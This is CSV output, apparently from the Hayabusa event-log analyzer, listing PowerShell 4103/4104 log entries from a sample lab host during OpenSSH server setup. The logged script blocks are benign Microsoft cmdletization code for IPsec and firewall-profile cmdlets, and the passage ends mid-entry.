+2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.661 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.661 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.664 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 